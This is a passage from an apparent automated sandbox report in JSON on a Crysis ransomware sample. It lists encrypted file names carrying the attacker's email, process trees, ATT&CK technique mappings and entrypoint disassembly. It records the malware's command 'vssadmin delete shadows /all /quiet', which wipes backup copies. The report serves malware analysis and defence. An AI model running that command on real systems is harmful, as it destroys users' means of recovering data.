"DISMHOST.EXE.67A614A7.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Job1_18.drt.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 38650, "sha256": "5d0af9dbd093f31cda223c6a8e422598e2f34d55c555113c47053345ee5bbf63", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "BacG4_20.PNG.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 36652, "sha256": "d6043216cd2ed2ea7db23453892cf99496375f2958bb773a07fc551e6b10eca4", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Kind2_08.PNG.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 35788, "sha256": "0557f23fa3fa61dfda3cd7cd57450255580289eb1d6617310b3cd4094ccea3e9", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Monthly Calendar - Land.hcdt.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 28956, "sha256": "abbcf2ac21dc2bc52adb5317c90de04ff207056bc27939e31a67d9b06851f1f6", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MODE.COM.67A60B94.bin", "file_size": 25088, "sha256": "efc11f8fcdd0a8649ebee758b105db10536e895ea6d586a07b61f68b1e5dbd20", "type_tags": ["peexe", "executable"], "description": "PE32 executable (console) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "TaleF_05.drt.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 24828, "sha256": "03451b2dad277467e0c07d54572854b56ecc066bca418753fb7f6628108bbc46", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CAni1_02.PNG.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 22380, "sha256": "e5d711be43916919d21bec6186c72b60817aeb3fe52dd3fb6206b71cd44c9999", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "COthe_05.drt.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 15100, "sha256": "687a64b6edc270aef7713e3acaaaf9e6260e60ed09be3b42c806216df79b4ec7", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ui-strings.js.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 7470, "sha256": "0314b16b5c4cd4a460b063c34232d543531687ef20d18cf066ba2d0671ce9e0e", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Offi1_19.PNG.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 14156, "sha256": "3056e6bb0559b14b09fb8b5c469133a5b57fedcb85578cd008936864794c0e57", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "HM07_01.png.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 9962, "sha256": "83ad3e1bdae9a8c607dc9adeca510b9b2a3d68802a014f037b6b47c9e5fbb767", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "HeaderConstants.au3.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 7274, "sha256": "f89a89c32a1698a2d64ed2ac597703758a8bbf7ed998697bc0857ff9952a1833", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_GUICtrlRebar_GetBKColor.au3.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 2844, "sha256": "0bd6513c7a42f1b42d0806b6724163ee7fb7c269d11811b972d82a4803fa85a0", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 10.10 (Visual Studio 2010) (build: 40219)", "11 .C Files (with LTCG) compiled with CL.EXE 16.00 (Visual Studio 2010) (build: 40219)"], "imported_objects": ["3 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a medium codebase (11 files)"], "total_file_compositions_imports": 10}, "processes": [{"uid": "00000000-00006140", "name": "c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe", "normalized_path": "C:\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe", "sha256": "c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0", "av_label": "Trojan.Ransom.Crysis", "av_matched": 18, "av_total": 22}, {"uid": "00000000-00005932", "parentuid": "00000000-00006140", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006132", "parentuid": "00000000-00005932", "name": "mode.com", "normalized_path": "%WINDIR%\\system32\\mode.com", "command_line": "mode con cp select=1251", "sha256": "efc11f8fcdd0a8649ebee758b105db10536e895ea6d586a07b61f68b1e5dbd20"}, {"uid": "00000000-00004048", "parentuid": "00000000-00005932", "name": "vssadmin.exe", "normalized_path": "%WINDIR%\\system32\\vssadmin.exe", "command_line": "vssadmin delete shadows /all /quiet", "sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Double File Extension", "attck_id": "T1036.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/007", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}, {"tactic": "Impact", "technique": "Inhibit System Recovery", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490", "malicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"NtCreateNamedPipeFile\" (UID: 00000000-00006140)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\syncronize_741U9BA\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\syncronize_741U9BU\"\n \"Global\\syncronize_741U9BA\"\n \"Global\\syncronize_741U9BU\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A614A7.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MODE.COM.67A60B94.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,sub\tesp, 0x1b0,mov\tdword ptr [ebp - 0x19c], 0,mov\tdword ptr [ebp - 4], 0,mov\tdword ptr [ebp - 8], 0,push\t0x80,push\t0x40e000,push\t0xa13c,push\t0x40e080,push\t0x40e080,call\t0x4019d0,add\tesp, 0x14,push\t0x80,push\t0x40e080,push\t0x5da,push\t0x40e53e,push\t0x40e53e,call\t0x4019d0,add\tesp, 0x14,\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,sub\tesp, 0x1b0,mov\tdword ptr [ebp - 0x19c], 0,mov\tdword ptr [ebp - 4], 0,mov\tdword ptr [ebp - 8], 0,push\t0x80,push\t0x40e000,push\t0xa13c,push\t0x40e080,push\t0x40e080,call\t0x4019d0,add\tesp, 0x14,push\t0x80,push\t0x40e080,push\t0x5da,push\t0x40e53e,push\t0x40e53e,call\t0x4019d0,add\tesp, 0x14,\"\n \"DISMHOST.EXE.67A614A7.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"\n \"MODE.COM.67A60B94.bin\" file has an entrypoint instructions - \"call\t0x1004c31,jmp\t0x10046f8,int3\t,int3\t,int3\t,int3\t,int3\t,cmp\tecx, dword ptr [0x1006010],jne\t0x1004945,ret\t0,jmp\t0x1004cc7,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,jmp\tdword ptr [0x10010a4],int3\t,int3\t,int3\t,int3\t,int3\t,mov\tedi, edi,push\tebp,mov\tebp, esp,mov\teax, dword ptr [ebp + 8],mov\teax, dword ptr [eax],cmp\tdword ptr [eax], 0xe06d7363,jne\t0x1004998,cmp\tdword ptr [eax + 0x10], 3,jne\t0x1004998,mov\teax, dword ptr [eax + 0x14],cmp\teax, 0x19930520,je\t0x1004992,cmp\teax, 0x19930521,je\t0x1004992,cmp\teax, 0x19930522,je\t0x1004992,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, 